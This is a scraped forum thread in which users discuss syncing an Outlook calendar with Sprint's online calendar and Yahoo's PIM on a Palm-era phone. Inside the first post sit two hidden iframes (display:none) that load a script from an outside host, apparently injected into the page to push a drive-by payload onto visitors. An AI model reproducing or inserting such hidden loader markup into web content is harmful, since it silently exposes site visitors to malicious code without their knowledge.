+ Reply to Thread

Thread: Calendar Sync

Calendar Sync

OK. I've got voice command, I've got wireless mail, and now all I need is a wireless calendar. Sprint's calendar seems optimal, as their site could serve as my one stop shop. I am having trouble synchronizing my outlook calendar to the sprint online calendar, however. Wireless tech support HASN'T A CLUE! The reason I have voice command now is the tech told me I needed it to sync my calendar. Apparently not so. Has anyone been succesful at syncing?

I've managed to somehow download fusion one from the PCS website whichenabled me to upload my contacts. Any ideas?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Beams from above...
    I got an email from Palm today saying that the MyPalm service is about to go down and recommending Yahoo as a web-based synchronizable PIM.

John

Angry

I got that too. Was just hoping to use Sprint. can't understand the purpose of an online calendar that can't be synced.?!

I've had lots of success synching my palm with Yahoo, but I used a different Synch program (TrueSync, which Yahoo provided). Dunno if that works with the I300, though...

My problem now is, after trying to find a way to sync calendars, I forgot why I wanted to.